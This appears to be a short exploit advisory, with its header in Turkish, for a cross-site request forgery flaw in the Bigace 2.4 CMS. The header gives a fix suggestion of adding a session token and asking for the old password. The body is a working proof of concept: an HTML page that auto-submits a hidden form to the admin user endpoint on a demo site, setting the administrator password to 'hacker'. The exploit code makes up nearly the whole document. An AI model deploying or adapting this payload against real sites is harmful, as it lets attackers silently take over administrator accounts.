< ------------------- header data start ------------------- >

#############################################################

# Application Name : Bigace 2.4

# Vulnerable Type : Xsrf

# Infection : Uzaktan otomatik olarak admin pass change edilebilir.

# Bug Fix Advice : Form’a Oturum Key’i (Session Token) eklenmeli, eski sifre sorulmalidir.

# author : Bug Researchers/system-hacker

############################################################

< ------------------- header data end of ------------------- >



< -- bug code start -- >

<bOdy onload=Submit();>
<script>function Submit(){document.password.submit();}</script>
<form

action=http://demo.opensourcecms.com/bigace/bigace/admin/userAdmin_len/index.html?mode=admin&dataid=1

method=post onsubmit=return comparepasswords(this) name=password id=password>
<input type=hidden name=mode value=changepassword>
<input type=hidden name=data[id] value=1>
<input type=password name=passwordnew maxlength=30 size=35 value=hacker>
<input type=password name=passwordcheck maxlength=30 size=35 value=hacker>
<input class=autoSubmit type=submit value=Save>
</form>


< -- bug code end of -- >